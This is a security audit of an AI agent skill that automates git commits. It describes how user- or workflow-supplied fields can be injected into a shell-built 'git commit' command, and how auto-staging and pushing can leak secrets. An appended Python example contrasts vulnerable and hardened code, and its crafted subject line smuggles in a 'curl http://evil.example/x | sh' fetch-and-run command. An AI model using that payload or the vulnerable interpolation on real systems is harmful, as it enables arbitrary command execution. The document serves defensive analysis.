git-commit

Warn

Audited by Gen Agent Trust Hub on Mar 30, 2026

Risk Level: MEDIUM (COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION]: The skill executes multiple shell commands including git status, git add ., git commit, and git push to automate version control tasks. These commands are executed directly in the user's shell environment.
  • [DATA_EXFILTRATION]: In its default 'Automatic Mode', the skill performs a git push to the remote repository. Pushing is standard functionality for a git tool, but because the preceding git add . stages every modified and untracked file, the default-on automation removes the human review step that would otherwise catch secrets, credentials, or unintended files before they are sent to the remote server.
  • [PROMPT_INJECTION]: The skill constructs shell commands by interpolating externally supplied strings (type, scope, ID, subject) into a git commit command. The instruction set specifies no quoting or escaping of shell metacharacters (backticks, semicolons, pipe symbols), so a crafted value can close the quoted commit message, terminate the git command, and run arbitrary commands with the agent's privileges. The inputs can originate from user prompts or from automated workflows, which is what makes this a prompt-injection-to-command-injection path rather than a purely local bug.
  • Ingestion points: Inputs such as subject and jira_id are ingested from user prompts or the jira-fix-workflow (SKILL.md).
  • Boundary markers: None identified in the prompt interpolation logic.
  • Capability inventory: The skill uses git shell commands via git add ., git commit -m, and git push (SKILL.md).
  • Sanitization: No sanitization or escaping of shell metacharacters is described in the instruction set.
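The injection path described in the findings above, shown as an added example that is not part of the audit or of the git-commit skill itself. The vulnerable function builds the shell string the way the audit describes; the hardened function validates the identifier-like fields against an allow-list, bounds the free-text subject, and passes the commit message as a single argv element so it never reaches a shell. Field names, the regexes, the allowed commit types and the sample inputs (including the crafted subject) are constructed for this example and are not taken from SKILL.md.

```python
import re
import shlex
import subprocess

# Constructed sample inputs standing in for the type/scope/ID/subject the skill interpolates.
TYPE = "fix"
SCOPE = "auth"
JIRA_ID = "PROJ-123"
SUBJECT_BENIGN = "handle expired tokens"
# Crafted subject, constructed for this example: closes the quoted message, then runs more commands.
SUBJECT_MALICIOUS = 'handle tokens"; curl http://evil.example/x | sh; echo "'

# Allow-list for the identifier-like fields (assumed conventional-commit vocabulary).
ALLOWED_TYPES = {"feat", "fix", "docs", "style", "refactor", "test", "chore"}
SCOPE_RE = re.compile(r"^[A-Za-z0-9_.-]{1,40}$")
JIRA_RE = re.compile(r"^[A-Z][A-Z0-9]{1,9}-\d{1,6}$")
SUBJECT_MAX_LEN = 72


def format_message(type_, scope, jira_id, subject):
    """Compose the commit subject line: e.g. 'fix(auth): PROJ-123 handle expired tokens'."""
    return f"{type_}({scope}): {jira_id} {subject}"


def unsafe_shell_command(type_, scope, jira_id, subject):
    """Vulnerable pattern: the message is interpolated into a string handed to a shell.

    A subject containing a double quote followed by ';' or '|' ends the git command and
    everything after it executes as a separate command.
    """
    return f'git commit -m "{format_message(type_, scope, jira_id, subject)}"'


def is_valid(type_, scope, jira_id, subject):
    """Allow-list the structured fields; bound the free-text subject and reject control chars."""
    if type_ not in ALLOWED_TYPES:
        return False
    if not SCOPE_RE.match(scope) or not JIRA_RE.match(jira_id):
        return False
    if not subject or len(subject) > SUBJECT_MAX_LEN:
        return False
    # Newlines and other control characters could smuggle a fake body/trailer into the message.
    if any(ord(c) < 32 or ord(c) == 127 for c in subject):
        return False
    return True


def safe_commit_argv(type_, scope, jira_id, subject):
    """Hardened pattern: validate, then return an argv list for subprocess with shell=False.

    The whole message is one argv element, so shell metacharacters in it are inert.
    """
    if not is_valid(type_, scope, jira_id, subject):
        raise ValueError("rejected commit fields")
    return ["git", "commit", "-m", format_message(type_, scope, jira_id, subject)]


def shell_roundtrip(argv):
    """Quote argv for a log line and split it back; equality shows the quoting is lossless."""
    return shlex.split(shlex.join(argv))


def run_commit(argv, dry_run=True):
    """Execute the commit without a shell. dry_run returns the quoted command instead of running it."""
    if dry_run:
        return shlex.join(argv)
    subprocess.run(argv, check=True)  # shell=False by default: argv never reaches /bin/sh
    return None


if __name__ == "__main__":
    print("unsafe:", unsafe_shell_command(TYPE, SCOPE, JIRA_ID, SUBJECT_MALICIOUS))
    print("safe  :", run_commit(safe_commit_argv(TYPE, SCOPE, JIRA_ID, SUBJECT_MALICIOUS)))
```

The hardened version deliberately does not strip semicolons or pipes from the subject: those are legitimate in commit messages, and removing them would only hide the real fix, which is that the message is never parsed by a shell. The allow-list is reserved for the fields that have a fixed grammar (type, scope, ticket ID), where an injected `;` is never legitimate.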
Audit Metadata
Risk Level: MEDIUM
Analyzed: Mar 30, 2026, 03:34 PM
Security Audit — agent-trust-hub — git-commit